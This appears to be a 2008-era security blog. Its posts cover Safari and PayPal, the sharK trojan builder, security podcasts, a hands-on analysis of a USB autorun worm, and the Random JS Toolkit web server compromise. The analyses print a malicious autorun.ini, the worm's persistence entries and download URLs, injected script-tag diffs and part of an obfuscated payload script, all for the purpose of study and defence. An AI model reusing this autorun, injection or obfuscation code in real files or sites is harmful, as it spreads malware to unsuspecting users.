Big Mac

PayPal warns against using Apple's Safari:

Safari doesn't make PayPal's list of recommended browsers because it doesn't have two important anti-phishing security features, according to Michael Barrett, PayPal's chief information security officer.

A perfectly valid reasoning. A couple of Mac users cannot seem to understand the precaution suggested.

In other news, Apple customer service representatives are in denial too.

I called Apple and spoke with a couple of their reps. […] The reps were incredulous about the existence of malware specifically targeting Macs. They looked up articles about it while we were on the phone — they wouldn't believe me until they looked it up for themselves.

I have a couple of friends who use primarily use Mac OSX and other Apple products because of the sense of superiority that comes with it. Most of them are oblivious of the dangers. The sense of invincibility is simply a liability.

Point and Click Trojan

SharK definitely dumbs down Trojan creation, requires no programming skill at all. It allows for the creation of malware with features such as:

• encryption
• polymorphism
• custom payloads
• virtual machine detection
• compression
• debugger detection
• password mining
• remote management
• software inventory
• active process and network connection information
• capture desktop and webcam images
• record audio
• log keystrokes
• analyze network traffic
• take out the trash (not really)

Impressive set of features and capabilities. I wouldn't be surprised if signature-based detection for sharK-made malware variants are abysmal. At the moment I can't think of legitimate uses for sharK besides remote administration.

It's interesting to note that sharK has detection capabilities for sandboxes and virtual machines. The Trojan can be made to behave differently when detected running inside the following:

• VMWare
• Microsoft Virtual PC
• Innotek VirtualBox
• Symantec Altiris SVS
• Sandboxie
• Norman Sandbox

If you're wondering how the local neighborhood kiddie is churning out custom malware, sharK is the likely tool.

Top 10 Podcast Episodes

Over the years I have compiled my favorite security podcast episodes. Here is my list of top ten shows. Most of these episodes are interviews. Here they are in no particular order:

1. The Silver Bullet Security Podcast, Show 013 - An Interview with Ross Anderson
   Gary McGraw interviews Ross Anderson author of the book Security Engineering. He is one of the researchers in the Security Group at the University of Cambridge Computer Laboratory which has a blog that I check regularly called Light Blue Touchpaper.
   
   Gary and Ross talk about the book, economics of information security, Ben Edelman's paper, disclosure and RFID MITM attacks
   


2. The Silver Bullet Security Podcast, Show 016 - An Interview with Greg Hoglund
   Gary interviews Greg Hoglund author of Exploiting Software, Rootkits, Exploiting Online Games. In fact Gary McGraw co-authored the first and third book mentioned.
   
   They talk about reverse engineering, disclosure, rootkits, EULAs, exploiting software and cheating online games.
   


3. SploitCast Podcast #008
   Guest Victor Oppleman author of Extreme Exploits discuss the RADB, ISP attacks, darknets, uRPF, botnets, DDoS, DNS attacks, tools.
   
   I originally wanted to feature a ThreatCast interview of Barrett Lyon, founder of Prolexic but I think this interview of Victor covers more ground not just DDoS attacks.
   


4. SploitCast Podcast #016
   The host interviews Dino Dai Zovi, discussing the fascinating topic of virtual machine rootkits, OS X security, wifi attacks, vulnerability development, disclosure and Microsoft security.
   


5. StillSecure, After all these years, Podcast #47 - Web application security with RSnake and Jeremiah
   Alan and Mitchell interview Robert "RSnake" Hansen of ha.ckers.org, founder of SecTheory -- Jeremiah Grossman, founder and CTO of Whitehat Security. Of course they discussed application security and of course focused more on web application security.
   


6. ThreatCast - Great debate podcast : NAC v SNF
   Alan Shimel, Chris Hoff, Richard Steinnon and Mike Rothman debate over NAC, Network Admission Control. Bullshit was thrown, heads were rolling and no conclusions were arrived at.
   


7. Security Now 91: Marc Maiffret of eEye Digital Security
   Leo and Steve interview Marc Maiffret. Marc talks about how he got started with security, Windows and Mac OS X security, 0days, vulnerability development, client side attacks and eEye's products.
   


8. McAfee AudioParasitics Episode 17
   Jim and Dave is joined by Dave Aitel of Immunity. Dave Aitel talks about his stint at @stake, Immunity products, mobile devices, penetration testing, virtualization, vulnerability development and malware.
   


9. McAfee AudioParasitics Episode 19
   McAfee AudioParasitics Episode 20
   This two-part show features guests Rafal Wojtczuk and Rahul Kashyap. The hosts and the guests talk about malware on virtual machines and virtualization security in general.
   


10. PaulDotCom Security Weekly - Interview with Mike Poor & Ed Skoudis - Part 1
    PaulDotCom Security Weekly - Interview with Mike Poor & Ed Skoudis - Part 2
    Larry and Paul interviews Mike Poor and Ed Skoudis. They talk about their first computers, how they got started in security, SANS, ISC, botnets, malware, Brazilian hacker groups, physical NOP Sleds, research and security in general.
    

Listen up to these podcasts while they're still online and most of the topics discussed aren't stale yet.

Amateur Malware Analysis

A friend asked me to check his USB drive because it was not working. I attached it to my notebook and mounted it. Seems fine, I can access his files plus a bonus suspicious executable with a blurry folder icon. Apparently the USB port he was attaching the drive to is not working. I copied the executable and the autorun.ini from his drive.

It's a Satuday evening and I have some time to spare so I check out the suspected malware. Here I take a shot at malware analysis.

The autorun.ini is obvious:

[Autorun]
Open=scvhost.exe
Shellexe cute=scvhost.exe
Shell\Open\command=scvhost.exe
Shell=Open

Uploaded scvhost.exe to Jotti's malware scan.

Uploaded it to Norman Sandbox but it does not show any helpful information.

[ DetectionInfo ]
   * Sandbox name: NO_MALWARE
   * Signature name: DLoader.EGQI
   * Compressed: YES
   * TLS hooks: NO
   * Executable type: Application
   * Executable file structure: OK

[ General information ]
  * Decompressing UPX3.
  * File length:       225792 bytes.
  * MD5 hash: 24fcddb3010f0dc16079af055a9970f0.

I tried to uncompress it using UPX but it seems to be intentionally corrupted or compressed with UPOLYX.

$ upx-3.02-i386_linux/upx  -d scvhost.exe 
                       Ultimate Packer for eXecutables
  Copyright (C) 1996,1997,1998,1999,2000,2001,2002,2003,2004,2005,2006,2007
UPX 3.02        Markus Oberhumer, Laszlo Molnar & John Reiser   Dec 16th 2007

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
upx: scvhost.exe: NotPackedException: not packed by UPX

Unpacked 0 files.

The uncompressed part of the executable reveals a couple of details. Looks like it was scripted with AutoIT.

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
        <assemblyIdentity
            type="win32"
            processorArchitecture="*"
            version="3.0.0.0"
            name="AutoIt3"
        />

For dynamic analysis I used Sandboxie. The files it creates:

• C:\WINDOWS\himhem.scr
• C:\WINDOWS\scvhost.exe
• C:\WINDOWS\system32\autorun.ini
• C:\WINDOWS\system32\blastclnnn.exe
• C:\WINDOWS\system32\scvhost.exe

Based on the created files this is a variant of W32.Blastclan.

It also creates these registry entries:

• HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\"Yahoo Messengger" = "C:\WINDOWS\system32\scvhost.exe"
• HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\"Shell" = "X"

I don't know why the Shell is set to X probably because it can't fetch a configuration file.

I dumped the malware's memory and found some interesting strings like this command for a scheduled run:

/C AT 09:00 /interactive /EVERY:m,t,w,th,f,s,su C:\WINDOWS\system32\blastclnnn.exe

I also saw a reference to IsDebuggerPresent which checks for a user-mode debugger.

I ran a sniffer to watch the malware's network traffic. It tries to fetches these files:

• http://setting3.yeahost.com/setting.xls
• http://setting3.9999mb.com/setting.xls
• http://setting3.9999mb.com/setting.doc
• http://www.freewebs.com/setting3/setting.doc

Those are offline now.

Unfortunately I do not have a valid configuration for the malware to further analyse it. Scouring the anti-malware sites this worm seems to have several variants. Good evening.

Random JS Toolkit

Last week we saw the media coverage of the Random JS Toolkit. Several Linux servers were compromised for malware distribution, directly infecting visitors. The initial vector of compromise is currently unknown and the rootkit installed afterwards is very stealthy to an inexperienced administrator.

It was reported that some sites were compromised repeatedly even after a fresh operating system reinstall. As of this moment some of these sites are still up today serving malware even though they are knowingly rooted.

It is easier to analyse the malware infection than the server compromise. The toolkit inserts a randomly named JavaScript file right after the <body> tag of web pages.

<script language='JavaScript' type='text/javascript' src='uxayo.js'></script>

Here are sample diffs of infected pages.

  <body lang=EN-US link=blue vlink=purple style='tab-interval:.5in'
-  stylesrc=main.html>
+  stylesrc=main.html>    
+<script language='JavaScript' type='text/javascript' src='uxayo.js'></script>
   <div class=Section1>
   <p class=MsoNormal><!--webbot bot="Include" tag="BODY" u-include="main.html"
</head>

 -->
   </script>
  </head>
-<body>
+<body><script language='JavaScript' type='text/javascript' src='pkfae.js'></script>
 <table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
   <tr>

The line is inserted by the toolkit on the first visit based on the IP address and then randomly inserted afterwards. The malicious JS file has several malware embedded which is obfuscated by unescape() sequences and it also downloads a trojan binary to the visitor's machine. The filename of the binary is also randomized as seen on the top of the JS file.

var arg="xxcjutss";

var MU = "http://" + document.location.hostname + "/" + arg;
var MH = '';
var MUT = MU;
for (i=0; i < MUT.length; i++)
{
        var b = MUT.charCodeAt (i);
 MH = MH + b.toString (16);
}
MH = MH.toUpperCase();
if (Math.round(MUT.length/2) != (MUT.length/2))
{
 MH += '00';
}

var MR = '';
for (i=0; i < MH.length; i += 4)
{
 MR = MR + '%u' + MH.substring(i+2, i+4) + MH.substring(i, i+2);
}

var MU2 = "\"" + MU + "\"";
var MR2 = "\"" + MR + "\"";

var SB =
unescape ('%6D%61%6C%77%61%72%65%0A') + 
MU2 +
unescape ('%6D%61%6C%77%61%72%65%0A') +
MR2 +
unescape ('%6D%61%6C%77%61%72%65%0A') +
MU2 +
unescape ('%6D%61%6C%77%61%72%65%0A');

document.write (SB);

More information on the malicious JS can be seen at the TrendLabs Malware Blog. This random JS generation component of the toolkit has been seen and reported as early as April 2007 and July 2007 respectively. Similar to other victims they have no idea where the random JS is coming from.

From what I can gather the initial break-in is not through PHP core or web applications since I have seen infected plain html and PHP pages. Also seen Apache 2 and 1.3 serving these infected pages, JS and binaries. cPanel has released an informative security note for this toolkit. Seems to be an unknown root compromise happening on the servers. If the root shell is obtained or the rootkit is installed through /dev/kmem the following patch can disable writing to it. Note that this is just a workaround since the real cause of the initial compromise is unknown.

--- linux/drivers/char/mem.c 2007-10-10 04:31:38.000000000 +0800
+++ linux/drivers/char/mem_nowrite.c 2008-01-20 15:26:32.000000000 +0800
@@ -179,7 +179,7 @@ static ssize_t write_mem(struct file * f
 
  if (!valid_phys_addr_range(p, count))
   return -EFAULT;
-
+        return -EPERM;
  written = 0;
 
 #ifdef __ARCH_HAS_NO_PAGE_ZERO_MAPPED

To workaround the inclusion of the JS file some resorted to patching even though they are knowingly compromised.

 </head>
 <script language='JavaScript' type='text/javascript'>/*
-//<body >
+//<body ><script language='JavaScript' type='text/javascript' src='rylet.js'></script>
 //
 */
 </script>

And even tried to mask the server software and version in case it is an automated compromise.

$ curl -I www.reallybored.net 
HTTP/1.1 200 OK
Date: Fri, 18 Jan 2008 14:52:23 GMT
Server: WebServerX
X-Powered-By: PHP/4.4.6
Content-Type: text/html

$ curl -I www.bellingerfurniture.co.uk
HTTP/1.1 200 OK
Date: Fri, 18 Jan 2008 15:24:18 GMT
Server:  
X-Powered-By: PHP/4.3.11
Content-Type: text/html

The details of the initial compromise is unknown yet because researchers are having a hard time obtaining post mortem server images. Based on the information available, if this is a software vulnerability I reckon this is an obscure vulnerability in Apache (or module) coupled with an equally obscure Linux kernel vulnerability. If that is not the case, most likely it is a backdoored server image or distribution software package. The multiple stage compromise and infection done on different operating systems is cunning. This is a good example why good guys should always be in the know and should at least keep up with the bad guys.

Here are URLs for additional information on this nefarious toolkit.
http://blog.scansafe.com/journal/2008/1/15/mom-pop-sites-hit-hard-by-host-compromise.html
http://www.finjan.com/Pressrelease.aspx?id=1820&PressLan=1819&lan=3
http://www.webhostingtalk.com/showthread.php?t=651748
http://www.theregister.co.uk/2008/01/11/mysterious_web_infection/
http://www.channelregister.co.uk/2008/01/16/mysterious_web_infection_continues/